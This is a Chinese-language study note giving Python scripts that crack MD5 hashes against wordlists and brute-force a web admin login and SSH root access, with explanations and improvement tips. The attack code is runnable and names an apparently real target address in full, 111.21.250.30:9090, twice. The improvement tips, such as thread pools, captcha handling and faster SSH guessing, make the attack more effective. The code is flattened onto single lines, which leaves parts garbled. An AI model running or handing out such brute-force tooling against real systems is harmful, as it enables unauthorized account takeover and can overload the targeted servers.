声明：笔记的只是方便各位师傅学习知识，以下代码、网站只涉及学习内容，其他的都与本人无关，切莫逾越法律红线，否则后果自负。

爆破Sales系统

一、爆破MD5 场景：已知MD5的加密字符串，如何得知明文？

解决方案：

算法碰撞：一串128位的MD5（32位16进制），其组合数量：2^128 字典碰撞：给定一个字典文件，读取里面的密钥明文，对其进行MD5加密，再和目标字符串进行对比，如果相同，则明文找到。

二、爆破后台

1. 验证登录请求

2. 已知用户名，爆破密码

3. 未知用户名，未知密码爆破

三、爆破条件与防范

1. 登录成功或失败的条件可验证

2. 服务器端允许多次失败登录而不会禁止

基于md5爆破-源码

import hashlib
import threading
import time
import requests# 爆破md5
def md5(source):with open('字典/常见字典1000.txt') as file:pw_list = file.readlines()with open('字典/数字字母符号型1000+.txt') as file:pw_list2 = file.readlines()# 追加字典pw_list.extend(pw_list2)# 遍历列表，逐个对比for password in pw_list:if hashlib.md5(password.strip().encode()).hexdigest() == source:print(f'成功破解，密码是：{password.strip()}')# 爆破某后台——仅爆破密码
# 单线程爆破
def ws_single():with open('字典/常见字典1000.txt') as file:pw_list = file.readlines()url = 'http://111.21.xxx.xxx:9090/login'count = 0for password in pw_list:data = {'username': 'admin', 'password': password.strip(), 'rememberMe': 'false'}  # 有时有验证码，需要另外操作resp = requests.post(url=url, data=data)if '{"msg":"用户不存在/密码错误","code":500}' not in resp.text:print(f'可能成功,密码为：{password.strip()}')count += 1print(f'共计尝试{count}次')exit()# 同时，由于多线程并发登录，导致服务器压力剧增（DOS）,进而服务器的响应时间会显著变慢
# 爆破某后台——不知账号不知密码
# 多线程爆破
count = 0def ws_thread(username):with open('字典/常见弱口令字典1000.txt') as file:pw_list = file.readlines()url = 'http://111.21.xxx.xxx:9090/login'global countfor password in pw_list:data = {'username': username, 'password': password.strip(), 'rememberMe': 'false'}  # 有时有验证码，需要另外操作resp = requests.post(url=url, data=data)if '{"msg":"用户不存在/密码错误","code":500}' not in resp.text:print(f'可能成功,账号为：{username.strip()}密码为：{password.strip()}')exit()count += 1print(f'共计尝试{count}次')# 如果用户字典有5000条怎么处理if __name__ == '__main__':# md5('cbb11ed87dc8a95d81400c7f33c7c171')with open('字典/2017_top100.txt') as file:user_list = file.readlines()for username in user_list:threading.Thread(target=ws_thread, args=(username.strip(),)).start()

基于md5爆破-源码

这段代码的主要目的是通过暴力破解的方式来尝试恢复MD5哈希值对应的明文密码，以及尝试登录到一个后台系统。以下是对代码的详细分析：

1. 导入必要的库

import hashlib
import threading
import time
import requests

• hashlib：用于计算MD5哈希值。

• threading：用于实现多线程，提高爆破效率。

• time：用于时间相关的操作（虽然在这个代码中没有使用）。

• requests：用于发送HTTP请求。

2. 爆破MD5

def md5(source):with open('字典/常见弱口令字典1000.txt') as file:pw_list = file.readlines()with open('字典/数字字母符号型1000+.txt') as file:pw_list2 = file.readlines()pw_list.extend(pw_list2)for password in pw_list:if hashlib.md5(password.strip().encode()).hexdigest() == source:print(f'成功破解，密码是：{password.strip()}')

• 读取两个字典文件中的密码列表。

• 将两个列表合并。

• 遍历每个密码，计算其MD5哈希值并与目标哈希值进行比较。

• 如果匹配成功，打印出密码。

3. 单线程爆破后台密码

def ws_single():with open('字典/常见弱口令字典1000.txt') as file:pw_list = file.readlines()url = 'http://111.21.250.30:9090/login'count = 0for password in pw_list:data = {'username': 'admin', 'password': password.strip(), 'rememberMe': 'false'}resp = requests.post(url=url, data=data)if '{"msg":"用户不存在/密码错误","code":500}' not in resp.text:print(f'可能成功,密码为：{password.strip()}')count += 1print(f'共计尝试{count}次')exit()

• 读取密码字典。

• 对指定的URL发送POST请求，尝试登录。

• 如果响应中不包含错误信息，认为登录可能成功。

• 统计尝试次数并退出。

4. 多线程爆破后台账号密码

count = 0def ws_thread(username):global countwith open('字典/常见弱口令字典1000.txt') as file:pw_list = file.readlines()url = 'http://111.21.250.30:9090/login'for password in pw_list:data = {'username': username, 'password': password.strip(), 'rememberMe': 'false'}resp = requests.post(url=url, data=data)if '{"msg":"用户不存在/密码错误","code":500}' not in resp.text:print(f'可能成功,账号为：{username.strip()}密码为：{password.strip()}')exit()count += 1print(f'共计尝试{count}次')if __name__ == '__main__':with open('字典/2017_top100.txt') as file:user_list = file.readlines()for username in user_list:threading.Thread(target=ws_thread, args=(username.strip(),)).start()

• 读取用户名字典。

• 对每个用户名启动一个线程，尝试使用密码字典中的密码进行登录。

• 如果登录成功，打印出用户名和密码并退出。

• 使用全局变量count统计尝试次数。

注意事项和潜在问题

1. 法律和道德问题：未经授权的暴力破解行为是违法的，可能会导致严重的法律后果。

2. 性能问题：多线程爆破会显著增加服务器的压力，可能导致服务器响应变慢甚至崩溃。

3. 安全性问题：代码中没有处理验证码等安全措施，实际应用中可能需要额外的处理。

4. 错误处理：代码中没有对网络请求的异常进行处理，可能会导致程序崩溃。

改进建议

1. 增加异常处理：对网络请求和其他可能出现的异常进行处理，提高程序的健壮性。

2. 优化多线程：可以考虑使用线程池来管理线程，避免创建过多线程导致系统资源耗尽。

3. 增加延迟：在每次请求之间增加适当的延迟，减少对服务器的压力。

4. 处理验证码：如果目标系统有验证码，需要实现验证码的处理逻辑。

这段代码展示了暴力破解的基本思路，但在实际应用中需要非常谨慎，确保有合法的授权和充分的准备。

ssh多线程爆破—源码

import time
import requests
import threading
import hashlib# 每个任务分10条
count = 0def threads(sublist):with open('字典/常见弱口令字典1000.txt') as file:pw_list = file.readlines()url = 'http://111.21.xxx.xxx:9090/login'global countfor username in sublist:for password in pw_list:data = {'username': username.strip(), 'password': password.strip(), 'rememberMe': 'false'}  # 有时有验证码，需要另外操作resp = requests.post(url=url, data=data)if '{"msg":"用户不存在/密码错误","code":500}' not in resp.text:print(f'可能成功,账号为：{username.strip()}密码为：{password.strip()}')count += 1print(f'共计尝试{count}次')exit()# 爆破ssh
import paramikodef ssh_creak():with open('字典/2017_top100.txt') as file:pw_list = file.readlines()for password in pw_list:try:transport = paramiko.Transport(('192.168.xxx.xxx', 22))transport.connect(username='root', password=password.strip())print(f"请求登录，密码为：{password.strip()}")except:passtime.sleep(2)# ssh = paramiko.SSHException()# ssh._transport = transportif __name__ == '__main__':# 每个线程负责10个用户# with open('字典/常见字典1000.txt') as file:#     user_list = file.readlines()# for i in range(0, len(user_list), 10):#     sublist = user_list[i:i + 10]#     threading.Thread(target=threads, args=(sublist,)).start()ssh_creak()

ssh多线程爆破—源码解析

这段代码主要实现了两个功能：一是对指定URL的登录接口进行暴力破解尝试，二是尝试使用密码字典对SSH服务进行暴力破解。

一、登录接口暴力破解部分

1. 全局变量与函数定义

   • 定义了全局变量count用于计数尝试次数。

   • threads函数接受一个用户名子列表作为参数。

     • 函数内部首先打开包含密码的字典文件常见字典1000.txt，读取其中的密码列表pw_list。

     • 设定目标登录接口的url为http://111.21.xxx.xxx:9090/login。

     • 对于子列表中的每个用户名，遍历密码列表。

       • 构造包含用户名、密码和rememberMe字段（值为false）的data字典。

       • 使用requests.post方法向目标url发送登录请求。

       • 如果响应文本中不包含表示用户不存在或密码错误的特定字符串{"msg":"用户不存在/密码错误","code":500}，则认为可能是正确的账号密码组合并打印出来。

       • 每次尝试后count加1，并在处理完一个用户名的所有密码尝试后打印出总的尝试次数，然后退出程序。

2. 多线程相关（被注释部分）

   • 原本计划是读取用户名字典文件（如常见字典1000.txt），将用户名列表按每10个一组划分成子列表。

   • 针对每个子列表启动一个线程，线程的目标函数为threads，并传入相应的子列表作为参数。

二、SSH暴力破解部分

1. ssh_creak函数

   • 打开名为2017_top100.txt的密码字典文件，读取其中的密码列表pw_list。

   • 对于密码列表中的每个密码：

     • 尝试使用paramiko.Transport建立到192.168.xxx.xxx地址的SSH连接，端口为22，用户名固定为root，密码为当前尝试的密码。

     • 如果连接成功（即没有抛出异常），则打印出正在尝试的密码。

     • 无论连接是否成功，都会暂停2秒（time.sleep(2)），这可能是为了避免过于频繁的连接尝试导致被目标主机封禁。

三、整体代码的问题与风险

1. 效率问题

   • 在登录接口暴力破解部分，每次处理完一个用户名就退出程序，这可能不是预期的行为，如果是多线程执行，这样会导致只有一个线程执行完就结束整个程序。

   • 对于SSH暴力破解部分，没有使用多线程或多进程来加速尝试过程，在密码字典较大时效率会很低。

2. 安全性与合规性问题

   • 这种暴力破解行为如果没有得到目标系统的授权，是不道德且可能违反法律法规的行为。

   • 在实际应用中，目标系统可能会有各种防护措施，如验证码、登录失败次数限制等，这段代码没有考虑这些情况。

四、改进建议

1. 修复多线程逻辑

   • 如果要使用多线程进行登录接口的暴力破解，应该修正线程启动部分的代码，确保所有线程都能正常执行而不是只执行一个就退出。

2. 优化SSH暴力破解效率

   • 可以考虑使用多线程或多进程来提高SSH密码尝试的速度，但要注意遵守法律法规和目标系统的使用规则。

3. 增加防护措施应对机制

   • 如果是在合法的安全测试场景下，应该增加代码来处理目标系统可能存在的验证码、登录失败次数限制等情况。